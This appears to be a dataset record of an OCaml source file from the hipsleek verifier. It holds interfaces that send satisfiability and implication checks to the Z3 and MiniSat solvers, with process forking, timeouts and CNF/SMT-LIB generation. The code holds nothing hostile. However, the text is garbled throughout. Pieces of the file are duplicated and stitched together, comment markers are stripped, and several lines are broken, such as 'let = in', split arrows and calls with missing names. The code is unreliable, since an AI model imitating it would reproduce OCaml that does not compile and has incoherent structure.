let () = PrvComms.stop !minisat_process num_tasks Sys.sigkill in
is_minisat_running := false;
)
restart Omega system
let restart reason =
if !is_minisat_running then (
let () = print_string (reason ^ " Restarting minisat after ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in
PrvComms.restart start stop
)
else (
let () = print_string (reason ^ " not restarting minisat ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in ()
)
(* Runs the specified prover and returns output *)
let check_problem_through_file (input: string) (timeout: float) : bool =
(* debug *)
(* let () = print_endline "** In function minisat.check_problem" in *)
let file_suffix = Random.int 1000000 in
let infile = "/tmp/in" ^ (string_of_int file_suffix) ^ ".cnf" in
(*let () = print_endline ("-- input: \n" ^ input) in*)
let out_stream = open_out infile in
output_string out_stream input;
close_out out_stream;
let minisat_result="minisatres.txt" in
let set_process proc = minisat_process := proc in
let fnc () =
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg;infile;minisat_result|]) set_process;
minisat_call_count := !minisat_call_count + 1;
let (prover_output, running_state) = get_answer !minisat_process.PrvComms.inchannel in
is_minisat_running := running_state;
prover_output;
)
else failwith "[minisat.ml] The value of minisat_input_format is invalid!" in
let res =
try
let fail_with_timeout () = restart ("[minisat]Timeout when checking sat!" ^ (string_of_float timeout)); false in
let res = PrvComms.maybe_raise_and_catch_timeout fnc () timeout fail_with_timeout in
res
with _ -> ((* exception : return the safe result to ensure soundness *)
Printexc.print_backtrace stdout;
print_endline ("WARNING: Restarting prover due to timeout");
Unix.kill !minisat_process.PrvComms.pid 9;
ignore (Unix.waitpid [] !minisat_process.PrvComms.pid);
false
) in
let () = PrvComms.stop !minisat_process 0 9 in
remove_file infile;
res
(**************************************************************
MAIN INTERFACE : CHECKING IMPLICATION AND SATISFIABILITY
*************************************************************)
(*******************zzzzzzzzzzzzzz****************)
(*generate the CNF *)
let cnf_to_string var_cnt f : string =
let fct l = String.concat " " (List.map (fun (c,b)-> if b then string_of_int c else ("-"^(string_of_int c))) l) in
"p cnf "^(string_of_int var_cnt)^" "^ (string_of_int (List.length f))^"\n"^
(String.concat " 0\n" (List.map fct f))^" 0\n"
let xor sv1 sv2 sv3 = [ [(sv1, false);(sv2,false)]; (*~v1 | ~v2 *)
[(sv1,true);(sv2,true);(sv3,false)]; (* v1 | v2 | ~v3 *)
~v1| v2 | v3
[(sv1,true);(sv2,false);(sv3,true)]] (* v1 | ~v2| v3 *)
let xorc sv1 sv2 = [[(sv1, true);(sv2,true)];[(sv1, false);(sv2,false)]]
let trans_vv sv1 sv2 = [[(sv1, true);(sv2,false)];[(sv1, false);(sv2,true)]]
let negVar v f = List.map (List.map (fun (c,b)-> if c=v then c,not b else c,b)) f
let rec tauto l = match l with
| [] -> false
| (c,b)::t-> (List.exists (fun (v,b1)-> c=v && b<>b1) t) || (tauto t)
let neg_f f =
let f = List.map (List.map (fun (c,b)-> c,not b)) f in
if f=[] then f
else List.fold_left (fun a c->
let r = List.concat (List.map (fun c-> List.map (fun d-> c::d) a) c) in
List.filter (fun c->not (tauto c)) r) (List.map (fun c-> [c]) (List.hd f)) (List.tl f)
let mkOr f1 f2 =
let l = List.map (fun l -> List.map (fun l2 -> l@l2) f2) f1 in
List.filter (fun c-> not (tauto c)) (List.concat l)
let mkExists vl f =
let fv = List.fold_left (fun a c-> a@ (List.map fst c)) [] f in
let vl = List.filter (fun c-> List.mem c fv) vl in
List.fold_left (fun f v-> mkOr f (negVar v f)) f vl
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found -> (tp:= !tp+1; Hashtbl.add ht v !tp;!tp) in
let trans_eq (v1,v2,c) = match c with
| C_top -> xorc (get_var v1) (get_var v2)
| PVar v3-> xor (get_var v1) (get_var v2) (get_var v3) in
let ante_f =
let nz = List.map (List.map (fun c-> get_var c, true)) a_nz_cons in (*conj of disj*)
let eqs = List.map trans_eq a_l_eqs in
let a_ev = List.map get_var a_ev in
mkExists a_ev (List.concat (nz::eqs)) in
let conseq_f =
let c_ev = List.map get_var c_ev in
let nz = List.map (List.map (fun c-> get_var c, true)) c_nz_cons in (*conj of disj*)
let eqs = List.map trans_eq c_l_eqs in
let c_subst = List.map (fun (v1,v2) -> trans_vv (get_var v1)(get_var v2)) c_subst_vars in
let c_const = List.map (fun (v,b) -> [[(get_var v, b)]]) c_const_vars in
let r = List.concat (nz::eqs@c_subst@c_const) in
let r = List.map (List.filter (fun (c,_)-> not (List.mem c c_ev))) (neg_f r) in
List.filter (fun c-> c<>[]) r in
let all_f = ante_f@conseq_f in
if all_f<>[] then
not (check_problem_through_file (cnf_to_string !tp (ante_f@conseq_f)) 0.)
else true
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst)
(c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
(* to delete *)
let nzsf l = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) l ) in
let pr_list f l = String.concat " \n " ( List.map f l ) in
let pr_pair f1 f2 ( ) = " ( " ^(f1 x1)^","^(f2 x2)^ " ) " in
(* let consl = pr_list (pr_pair Sv.string_of string_of_bool) c_const_vars in *)
(* let cvel = pr_list (pr_pair Sv.string_of Sv.string_of) c_subst_vars in *)
let anzs = nzsf a_nz_cons in
let cnzs = nzsf c_nz_cons in
let aeqss = string_of_eq_l a_l_eqs in
let = in
print_string ( " MINISAT IMPLY\n ante : nz : " ^anzs^";\n ex : " ^(pr_list Sv.string_of a_ev)^";\n eqs : " ^aeqss^";\n " ) ;
print_string ( " conseq : nz : " ^cnzs^";\n ex : " ^(pr_list Sv.string_of c_ev)^";\n veq : " ^cvel^";\n cons : " ^consl^";\n eqs : " ^ceqss^";\n " ) ;
(* to delete *)
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
( " r : " ^(string_of_bool r ) ) ;
r
let call_sat non_zeros eqs =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found ->
(tp:= !tp+1;
( v^ " " ^(string_of_int ! tp)^"\n " ) ;
let input =
let nz = List.map (List.map (fun c-> get_var c, true)) non_zeros in (*conj of disj*)
let eqs = List.map ( fun (v1,v2,c)->
let sv1 = get_var v1 in
let sv2 = get_var v2 in
match c with
| C_top -> xorc sv1 sv2
| PVar v3-> xor sv1 sv2 (get_var v3) ) eqs in
List.concat (nz::eqs) in
if input<> [] then
let input_str = cnf_to_string !tp input in
( input_str^"\n " ) ;
check_problem_through_file input_str minisat_timeout_limit
else true
let call_sat non_zeros eqs =
(* to delete *)
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
(* print_string ("MINISAT SAT: "^nzs^"\n"^eqss^"\n"); *)
(* (\* to delete *\) *)
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
module Solver_Z3 = Share_prover.Dfrac_s_solver(Ts)(Share_prover.Sv)(Ss_Z3_proc)
module Solver_mini = Share_prover.Dfrac_s_solver(Share_prover.Ts)(Share_prover.Sv)(Ss_minisat_proc)
module Solver = Solver_mini
module Eqs =
struct
type var = Sv.t
type const = Ts.stree
type pcvar = Solver.frac_perm
type eq = Solver.eq
type eq_syst = Solver.eq_syst
let mkVar = Sv.var_of
let mkEq v1 v2 v3 = (v1,v2,v3)
let mkEqS l1 l2 l3 l4 l5= {Solver.eqs_ex = l1; Solver.eqs_nzv = l2; Solver.eqs_ve=l3; Solver.eqs_vc=l4; Solver.eqs_eql = l5}
let mkcFull = Ts.top
let mkcEmpty = Ts.bot
let mkcNode = Ts.mkNode
let mkpcCnst c = Solver.Cperm c
let mkpcVar v = Solver.Vperm v
end;;
type cmd =
| Sat of Eqs.eq_syst
| Imply of Eqs.eq_syst * Eqs.eq_syst;;
| null | https://raw.githubusercontent.com/hipsleek/hipsleek/596f7fa7f67444c8309da2ca86ba4c47d376618c/bef_indent/shares_z3_lib.ml | ocaml | same as maybe_raise_timoeut just that it treats the timeout exception with the with_timeout function
closes the pipes of the named process
to delete
struct
type nz_cons = t_var list list
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let mkTop () = C_top
(\**********Z3 interface **********\)
(\** Create a boolean variable using the given name. *\)
let mk_sv_bool_var ctx sv = mk_bool_var ctx (Sv.get_name sv)
(\** Create a logical context. Enable model construction. Also enable tracing to stderr. *\)
let mk_context ()=
let cfg = Z3.mk_config () in
Z3.trace_to_stderr ctx;
ctx
let check ctx =(match Z3.check ctx with
| Z3.L_FALSE -> false
| Z3.L_TRUE -> true )
let add_eqs ctx =
List.iter (fun (v1,v2,v3)->
let bv1 = mk_sv_bool_var ctx v1 in
match v3 with
| C_top -> Z3.assert_cnstr ctx xor12
)
let add_nz ctx = List.iter (add_one_nz ctx)
let check_sat_nz ctx non_zeros =
Z3.push ctx;
else
List.for_all (fun l ->
Z3.push ctx;
add_one_nz ctx l;
let r= check ctx in
Z3.pop ctx 1;
r) non_zeros )
let ctx = mk_context () in
let r = check_sat_nz ctx non_zeros in
print_string ("r: "^(string_of_bool r)^"\n"); r
let ctx = mk_context () in
add_eqs ctx a_l_eqs;
print_string "added eqs\n";flush_all ();
if not (check_sat_nz ctx a_nz_cons) then (Z3.del_context ctx;true)
else
print_string "added exists\n";flush_all ();
try
Hashtbl.find tbl nm
with Not_found -> mk_bool_var ctx nm in
let conseq =
let z3v = mk_sv_bool_var_ex v in
Z3.mk_and ctx [| a ; z3v|]
) (Z3.mk_true ctx) c_const_vars in
let f_sv = List.fold_left (fun a (v1,v2)->
let z3v1 = mk_sv_bool_var_ex v1 in
let z3eq = Z3.mk_eq ctx z3v1 z3v2 in
) f_ccv c_subst_vars in
let f_nz = List.fold_left (fun a l ->
Z3.mk_and ctx [|a;Z3.mk_or ctx nz_arr|]
) f_sv c_nz_cons in
let f_eqs = List.fold_left (fun a (v1,v2,v3)->
let z3v1 = mk_sv_bool_var_ex v1 in
let f1 = Z3.mk_not ctx (Z3.mk_and ctx [|z3v1;z3v2|]) in
let a = Z3.mk_and ctx [|a;f1|] in
match v3 with
| C_top -> Z3.mk_and ctx [| a; xor12 |]
) f_nz c_l_eqs in
let types = Array.init l (fun _ -> bool_sort) in
let names = Array.init l (Z3.mk_int_symbol ctx) in
Z3.mk_forall ctx 0 [||] types names f_eqs in
print_string "constructed conseq\n";flush_all ();
print_string "added conseq\n";flush_all ();
let r = Z3.check ctx in
print_string "actuall check\n";flush_all ();
Z3.del_context ctx;
match r with
| Z3.L_FALSE -> true
| Z3.L_UNDEF -> print_string "unknown\n"; false
| Z3.L_TRUE -> false
let nzs =
String.concat "," (
print_string ("r: "^(string_of_bool r)); r
end;;
to delete
**********************************************************************************
*********Z3 interface *********
*********Z3 interface *********
*********Z3 interface *********
*********Z3 interface *********
**************************************************************
INTERATION
*************************************************************
solver returns sat
solver returns unsat
solver returns unknown or there is an exception
solver returns an exception
something diff to sat/unsat/unknown, retry-may lead to timeout here
Global settings
*********
"z3"
start z3 system in a separated process and load redlog package
send formula to z3 and receive result -true/false/unknown
**********************************************************************************
*********minisat interface *********
Global settings
minisat
valid value is: cnf
**************************************************************
INTERACTION
*************************************************************
output: - prover_output - the running status of prover: true if running, otherwise false
stop minisat system
Runs the specified prover and returns output
debug
let () = print_endline "** In function minisat.check_problem" in
let () = print_endline ("-- input: \n" ^ input) in
exception : return the safe result to ensure soundness
*************************************************************
MAIN INTERFACE : CHECKING IMPLICATION AND SATISFIABILITY
************************************************************
******************zzzzzzzzzzzzzz***************
generate the CNF
~v1 | ~v2
v1 | v2 | ~v3
v1 | ~v2| v3
conj of disj
conj of disj
to delete
let consl = pr_list (pr_pair Sv.string_of string_of_bool) c_const_vars in
let cvel = pr_list (pr_pair Sv.string_of Sv.string_of) c_subst_vars in
to delete
conj of disj
to delete
print_string ("MINISAT SAT: "^nzs^"\n"^eqss^"\n");
(\* to delete *\) | #include "xdebug.cppo"
open Share_prover
module PrvComms =
struct
type proc = {name:string; pid: int; inchannel: in_channel; outchannel: out_channel; errchannel: in_channel }
exception Timeout
external set_close_on_exec : Unix.file_descr -> unit = "unix_set_close_on_exec";;
let try_set_close_on_exec fd =
try set_close_on_exec fd; true with Invalid_argument _ -> false
let open_proc_full cmd args input output error toclose =
let cloexec = List.for_all try_set_close_on_exec toclose in
match Unix.fork() with
0 -> Unix.dup2 input Unix.stdin; Unix.close input;
Unix.dup2 output Unix.stdout; Unix.close output;
Unix.dup2 error Unix.stderr; Unix.close error;
if not cloexec then List.iter Unix.close toclose;
begin try Unix.execvp cmd args
with _ -> exit 127
end
| id -> id
let open_process_full cmd args =
let (in_read, in_write) = Unix.pipe() in
let (out_read, out_write) = Unix.pipe() in
let (err_read, err_write) = Unix.pipe() in
let inchan = Unix.in_channel_of_descr in_read in
let outchan = Unix.out_channel_of_descr out_write in
let errchan = Unix.in_channel_of_descr err_read in
let id = open_proc_full cmd args out_read in_write err_write [in_read; out_write; err_read] in
Unix.close out_read;
Unix.close in_write;
Unix.close err_write;
(inchan, outchan, errchan, id)
let open_proc cmd args out_file:int =
match Unix.fork() with
| 0 -> begin
let output = Unix.openfile out_file [Unix.O_CREAT;Unix.O_WRONLY] 0o640 in
Unix.dup2 output Unix.stdout; Unix.close output;
try Unix.execvp cmd args with _ -> exit 127 end
| id -> id
let sigalrm_handler = Sys.Signal_handle (fun _ -> raise Timeout)
let set_timer tsecs = ignore (Unix.setitimer Unix.ITIMER_REAL { Unix.it_interval = 0.0; Unix.it_value = tsecs })
let maybe_raise_and_catch_timeout (fnc: 'a -> 'b) (arg: 'a) (tsec: float) (with_timeout: unit -> 'b): 'b =
try
let old_handler = Sys.signal Sys.sigalrm sigalrm_handler in
let reset_sigalrm () = Sys.set_signal Sys.sigalrm old_handler in
let () = set_timer tsec in
let answ = fnc arg in
set_timer 0.0;
reset_sigalrm ();
answ
with
| Timeout ->
Printf.eprintf " maybe_raise_and_catch_timeout : UNEXPECTED Timeout after %s secs" (string_of_float tsec);
(with_timeout ())
| exc -> begin
Printf.eprintf " maybe_raise_and_catch_timeout : Unexpected exception : %s" (Printexc.to_string exc);
raise exc
end
let close_pipes (process: proc) : unit =
(try
flush process.outchannel;
Unix.close (Unix.descr_of_out_channel process.outchannel);
Unix.close (Unix.descr_of_in_channel process.errchannel)
with | e -> () );
(try
Unix.close (Unix.descr_of_in_channel process.inchannel)
with | e -> () )
let start (prover: string * string * string array) set_process =
let (prover_name, prover_proc, prover_arg_array) = prover in
try
let inchn, outchn, errchn, npid = open_process_full prover_proc prover_arg_array in
let process = {name = prover_name; pid = npid; inchannel = inchn; outchannel = outchn; errchannel = errchn} in
set_process process
with
| e -> begin
let () = print_string ("\n["^prover_name^".ml ]Unexpected exception while starting prover "^ prover_name ^ "\n") in
flush stdout; flush stderr;
raise e
end
let stop (process:proc) (invocations: int) (killing_signal: int) =
close_pipes process;
try
Unix.kill process.pid killing_signal;
ignore (Unix.waitpid [] process.pid)
with
| e -> ()
let restart start stop = stop (); start ()
module Ss_Z3 : SAT_SLV = functor ( Sv : SV ) - >
type t_var = Sv.t
type p_var = ( \*include Gen. EQ_TYPE with type t = v*\ )
| PVar of t_var
let stringofPvar v = match v with | C_top - > " T " | PVar v - > Sv.string_of v
let mkVar v = PVar v
let v = match v with | C_top - > None | PVar v - > Some v
let string_of_eq ( v1,v2,v3 ) = ( Sv.string_of v1)^ " * " ^(Sv.string_of v2)^ " = " ^(match v3 with | PVar v3 - > Sv.string_of v3 | _ - > " true " )
let string_of_eq_l l = String.concat " \n " ( List.map string_of_eq l )
let mk_bool_var ctx name = Z3.mk_const ctx ( ctx name ) ( Z3.mk_bool_sort ctx )
Z3.set_param_value cfg " MODEL " " false " ;
let ctx = in
( \ * * Check if ctx is sat . if sat , then could get the )
| Z3.L_UNDEF - > print_string " unknown\n " ; failwith " unknown sat "
let bv2 = mk_sv_bool_var ctx v2 in
let xor12 = Z3.mk_xor ctx bv1 bv2 in
| PVar v3- >
( Z3.assert_cnstr ctx ( Z3.mk_not ctx ( Z3.mk_and ctx [ |bv1;bv2| ] ) ) ;
ctx ( Z3.mk_eq ctx xor12 ( mk_sv_bool_var ctx v3 ) ) )
let add_one_nz ctx l= Z3.assert_cnstr ctx ( Z3.mk_or ctx ( Array.of_list ( List.map ( mk_sv_bool_var ctx ) l ) ) )
add_nz ;
if check ctx then ( Z3.pop ctx 1;true )
( Z3.pop ctx 1 ;
let call_sat non_zeros eqs =
add_eqs ctx eqs ;
Z3.del_context ; r
let call_sat non_zeros eqs =
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
print_string ( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
let = Hashtbl.create 20 in
let bool_sort = Z3.mk_bool_sort ctx in
let ( ) = List.fold_left ( fun c v- > Hashtbl.add tbl ( Sv.get_name v ) ( Z3.mk_bound ctx c bool_sort ) ; c+1 ) 1 c_ev in
let v =
let in
let f_ccv = List.fold_left ( fun a ( v , c)- >
let z3v = if c then z3v else Z3.mk_not ctx z3v in
let z3v2 = in
Z3.mk_and ctx [ |a ; z3eq| ]
let nz_arr = Array.of_list ( List.map mk_sv_bool_var_ex l ) in
let z3v2 = in
let xor12 = Z3.mk_xor ctx z3v1 z3v2 in
| PVar v3 - > Z3.mk_and ctx [ | a ; Z3.mk_eq ctx xor12 ( mk_sv_bool_var_ex v3 ) | ]
let l = c_ev in
Z3.assert_cnstr ctx ( Z3.mk_not ) ;
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) a_nz_cons ) in
let eqss = string_of_eq_l a_l_eqs in
print_string ( " \n Imply : " ^nzs^"\n"^eqss^"\n");flush_all ( ) ;
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
module Ss_Z3_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
let smt_of_acons (v,c) = if c then Sv.string_of v else "(not " ^(Sv.string_of v) ^" )"
let smt_of_asub (v1,v2) = "(= " ^(Sv.string_of v1) ^ " " ^ (Sv.string_of v2) ^ ")"
let smt_of_eq (v1,v2,v3) =
" (= " ^ " ( and " ^(Sv.string_of v1)^ " " ^ ( Sv.string_of v2)^ " ) " ^ " " ^ ( match v3 with PVar v- > Sv.string_of v | _ - > " 1 " ) ^ " ) "
let xor12 = "(xor " ^(Sv.string_of v1)^ " " ^ (Sv.string_of v2)^")" in
match v3 with
| PVar v3->
let eq = "(= " ^ xor12 ^ " " ^ (Sv.string_of v3) ^ ")" in
let neq = "(not (and " ^ (Sv.string_of v1)^ " " ^ (Sv.string_of v2) ^ " ) )" in
"(and " ^ eq^ " " ^ neq ^ " )"
| C_top -> xor12
let smt_of_anz nz = match nz with
| [] -> failwith "error, unexpected empty nz"
| h::t -> List.fold_left (fun a c-> "(or " ^ a ^ " " ^ (Sv.string_of c) ^ ")") (Sv.string_of h) t
let smt_of_ante (_,anz,asub,acons,aeq) =
let acons = List.map (fun c-> "(assert " ^ (smt_of_acons c) ^ ")\n") acons in
let asub = List.map (fun c-> "(assert " ^ (smt_of_asub c) ^ ")\n") asub in
let aeq = List.map (fun c-> "(assert " ^ (smt_of_eq c) ^ ")\n") aeq in
let anz = List.map (fun c-> "(assert " ^ (smt_of_anz c) ^ ")\n") anz in
String.concat "" (acons@asub@aeq@anz)
let smt_of_conseq (cex,cnz,csub,ccons,ceq) =
let ccons = List.map smt_of_acons ccons in
let csub = List.map smt_of_asub csub in
let ceq = List.map smt_of_eq ceq in
let cnz = List.map smt_of_anz cnz in
let s = List.fold_left (fun a c-> "(and " ^ a ^ " " ^ c ^ ")") "true" (ccons@csub@ceq@cnz) in
List.fold_left (fun a c -> "(exists ((" ^ (Sv.string_of c) ^ " Bool)) " ^ a ^ ")") s cex
type sat_type =
Collect all Z3 's output into a list of strings
let rec icollect_output chn accumulated_output : string list =
let output = try
let line = input_line chn in
icollect_output chn (accumulated_output @ [line])
else accumulated_output @ [line]
with
| End_of_file -> accumulated_output in
output
let sat_type_from_string r input=
if (r = "sat") then Sat
else if (r = "unsat") then UnSat
else
try
let (todo_unk:int) = Str.search_forward (Str.regexp "unexpected") r 0 in
(print_string "Z3 translation failure!"; failwith ("Z3 translation failure!!\n"^r^"\n input: "^input))
with
| Not_found -> Unknown
let iget_answer chn input=
let output = icollect_output chn [] in
sat_type_from_string (List.nth output (List.length output - 1)) input
let remove_file filename = try Sys.remove filename with | e -> ()
let prover_process = ref {
PrvComms.name = "z3";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
let smtsolver_name = ref ("z3": string)
let z3_call_count: int ref = ref 0
let is_z3_running = ref false
let test_number = ref 0
let last_test_number = ref 0
let z3_restart_interval = ref (-1)
let smtsolver_name = ref ("z3": string)
and start() =
if not !is_z3_running then begin
print_string "Starting z3... \n"; flush stdout;
last_test_number := !test_number;
PrvComms.start (!smtsolver_name, !smtsolver_name, [|!smtsolver_name;"-smt2"; "-si"|]) (fun proc -> prover_process := proc);
is_z3_running := true;
end
stop Z3 system
let stop () =
if !is_z3_running then begin
let num_tasks = !test_number - !last_test_number in
print_string ("Stop z3... "^(string_of_int !z3_call_count)^" invocations "); flush stdout;
let () = PrvComms.stop !prover_process num_tasks Sys.sigkill in
is_z3_running := false;
end
restart Z3 system
let restart reason =
if !is_z3_running then
let () = print_string (reason^" Restarting z3 after ... "^(string_of_int !z3_call_count)^" invocations ") in
PrvComms.restart start stop
else print_string (reason^" not restarting z3 ... "^(string_of_int !z3_call_count)^" invocations ")
let check_formula f timeout =
begin
if not !is_z3_running then start ()
else if (!z3_call_count = !z3_restart_interval) then
begin
restart("Regularly restart:1 ");
z3_call_count := 0;
end;
let fnc f =
incr z3_call_count;
output_string (!prover_process.PrvComms.outchannel) ("(push)\n" ^ f ^ "(pop)\n");
flush (!prover_process.PrvComms.outchannel);
iget_answer (!prover_process.PrvComms.inchannel) f
in
let fail_with_timeout () = restart ("[z3.ml]Timeout when checking sat!" ^ (string_of_float timeout)); Unknown in
PrvComms.maybe_raise_and_catch_timeout fnc f timeout fail_with_timeout
end
let rec rem_dups l = match l with [] -> [] | q::qs -> if (List.exists (Sv.eq q) qs) then rem_dups qs else q::(rem_dups qs)
let fv (exv,nz,subs,cons,eqs)=
let w1,w2 = List.split subs in
let fv_eq (v1,v2,v3)= v1::v2::(match v3 with C_top -> [] | PVar v-> [v]) in
exv@(List.concat nz)@(fst (List.split cons))@w1@w2@(List.concat (List.map fv_eq eqs))
let to_smt ante conseq : string =
let conseq1 = match conseq with
| None -> ([],[],[],[],[])
| Some f -> f in
let all_fv = rem_dups (fv ante @ fv conseq1) in
let smt_var_decls = String.concat "" (List.map (fun v -> "(declare-fun " ^ (Sv.string_of v) ^ " () Bool)\n" ) all_fv) in
let ante_str = smt_of_ante ante in
let conseq_str = if conseq=None then "false" else smt_of_conseq conseq1 in
( ";Variables declarations\n" ^smt_var_decls ^ ";Antecedent\n" ^ ante_str ^ ";Negation of Consequence\n" ^ "(assert (not " ^ conseq_str ^ "))\n" ^ "(check-sat)")
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst)
(c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let input = to_smt (a_ev, a_nz_cons, [],[],a_l_eqs) (Some (c_ev, c_nz_cons, c_subst_vars, c_const_vars, c_l_eqs)) in
( " \n \n z3 input : " ^(input)^"\n " ) ;
match check_formula input 0. with
| Sat -> false
| UnSat -> true
| Unknown -> false
| Aborted -> false
let call_sat non_zeros eqs =
match (check_formula (to_smt ([],non_zeros,[],[],eqs) None)) 10.0 with
| UnSat -> false
| _ -> true
let call_sat non_zeros eqs =
let nzs = String.concat "," (List.map (fun l-> "{"^(String.concat "," (List.map Sv.string_of l))^"}") non_zeros) in
let eqss = string_of_eq_l eqs in
( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
module Ss_minisat_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
let minisat_timeout_limit = 15.0
let test_number = ref 0
let last_test_number = ref 0
let minisat_restart_interval = ref (-1)
let log_all_flag = ref false
let is_minisat_running = ref false
default timeout is 15 seconds
let minisat_call_count: int ref = ref 0
let log_file = open_out ("allinput.minisat")
valid value is : " file " or " stdin "
let minisat_path = "/usr/local/bin/minisat"
let minisat_name = "minisat"
let minisat_arg = "-pre"
let number_clauses = ref 1
let number_var = ref 0
let minisat_process = ref { PrvComms.name = "minisat";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
let rec collect_output (chn: in_channel) : (string * bool) =
try
let line = input_line chn in
if line = "SATISFIABLE" then
(line, true)
else
collect_output chn
with
| End_of_file -> ("", false)
let get_prover_result (output : string) :bool =
let validity =
if (output="SATISFIABLE") then
true
else
false in
validity
let get_answer (chn: in_channel) : (bool * bool)=
let (output, running_state) = collect_output chn in
let
validity_result = get_prover_result output;
in
(validity_result, running_state)
let remove_file filename =
try Sys.remove filename;
with e -> ignore e
let set_process proc =
minisat_process := proc
let start () =
if not !is_minisat_running then (
print_endline_quiet ("Starting Minisat... \n");
last_test_number := !test_number;
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg|]) set_process;
is_minisat_running := true;
)
)
let stop () =
if !is_minisat_running then (
let num_tasks = !test_number - !last_test_number in
print_string ("\nStop Minisat... " ^ (string_of_int !minisat_call_count) ^ " invocations "); flush stdout;
let () = PrvComms.stop !minisat_process num_tasks Sys.sigkill in
is_minisat_running := false;
)
restart Omega system
let restart reason =
if !is_minisat_running then (
let () = print_string (reason ^ " Restarting minisat after ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in
PrvComms.restart start stop
)
else (
let () = print_string (reason ^ " not restarting minisat ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in ()
)
let check_problem_through_file (input: string) (timeout: float) : bool =
let file_suffix = Random.int 1000000 in
let infile = "/tmp/in" ^ (string_of_int file_suffix) ^ ".cnf" in
let out_stream = open_out infile in
output_string out_stream input;
close_out out_stream;
let minisat_result="minisatres.txt" in
let set_process proc = minisat_process := proc in
let fnc () =
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg;infile;minisat_result|]) set_process;
minisat_call_count := !minisat_call_count + 1;
let (prover_output, running_state) = get_answer !minisat_process.PrvComms.inchannel in
is_minisat_running := running_state;
prover_output;
)
else failwith "[minisat.ml] The value of minisat_input_format is invalid!" in
let res =
try
let fail_with_timeout () = restart ("[minisat]Timeout when checking sat!" ^ (string_of_float timeout)); false in
let res = PrvComms.maybe_raise_and_catch_timeout fnc () timeout fail_with_timeout in
res
Printexc.print_backtrace stdout;
print_endline ("WARNING: Restarting prover due to timeout");
Unix.kill !minisat_process.PrvComms.pid 9;
ignore (Unix.waitpid [] !minisat_process.PrvComms.pid);
false
) in
let () = PrvComms.stop !minisat_process 0 9 in
remove_file infile;
res
let cnf_to_string var_cnt f : string =
let fct l = String.concat " " (List.map (fun (c,b)-> if b then string_of_int c else ("-"^(string_of_int c))) l) in
"p cnf "^(string_of_int var_cnt)^" "^ (string_of_int (List.length f))^"\n"^
(String.concat " 0\n" (List.map fct f))^" 0\n"
~v1| v2 | v3
let xorc sv1 sv2 = [[(sv1, true);(sv2,true)];[(sv1, false);(sv2,false)]]
